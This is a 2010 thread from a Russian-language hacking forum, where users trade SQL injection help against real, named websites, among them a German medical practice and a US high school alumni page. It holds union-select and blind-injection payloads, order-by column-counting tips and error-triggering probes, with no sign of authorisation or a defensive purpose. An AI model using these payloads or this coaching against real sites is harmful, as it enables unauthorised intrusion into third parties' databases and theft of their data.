HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14331  
Старый 12.07.2010, 18:59
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441

Репутация: 0
По умолчанию

почему это не показывают, введенный номер?

http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+

http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
 
Ответить с цитированием

  #14332  
Старый 12.07.2010, 19:53
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от haito  
haito said:
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842+and+substring(version(),1,1)=5

крути как blind
 
Ответить с цитированием

  #14333  
Старый 12.07.2010, 20:10
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"server_name"[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_id` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/
COLOR][/COLOR
Что можно сделать, что бы выдалась ошибка?
 
Ответить с цитированием

  #14334  
Старый 12.07.2010, 20:37
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от SeNaP  
SeNaP said:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"server_name"[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_id` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/
COLOR][/COLOR
Что можно сделать, что бы выдалась ошибка?
да ничё какбы не сделаешь)
 
Ответить с цитированием

  #14335  
Старый 12.07.2010, 20:54
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
 
Ответить с цитированием

  #14336  
Старый 12.07.2010, 20:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от гаррет-тень  
гаррет-тень said:
Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
изменение контекста страницы.

ex.

order+by+1 -- страница загружается

order+by+100 -- Пустая страница
 
Ответить с цитированием

  #14337  
Старый 12.07.2010, 20:58
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

Спасибо.
 
Ответить с цитированием

  #14338  
Старый 12.07.2010, 20:58
happygirl
Guest
Сообщений: n/a
Провел на форуме:
2597

Репутация: 0
По умолчанию

Пожалуйста, помогите как вводить этот сайт?

http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'

Цитата:
Сообщение от None  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/alumni/html/queryTables.php on line 21
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977#
 
Ответить с цитированием

  #14339  
Старый 12.07.2010, 21:05
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

[QUOTE="happygirl"]
happygirl said:
Пожалуйста, помогите как вводить этот сайт?
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977#
 
Ответить с цитированием

  #14340  
Старый 13.07.2010, 00:27
mikhalev
Новичок
Регистрация: 16.05.2008
Сообщений: 14
Провел на форуме:
22777

Репутация: 0
Отправить сообщение для mikhalev с помощью ICQ
По умолчанию

Как использовать уязвимость в SharePoint ??? Примерчик можно ...???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ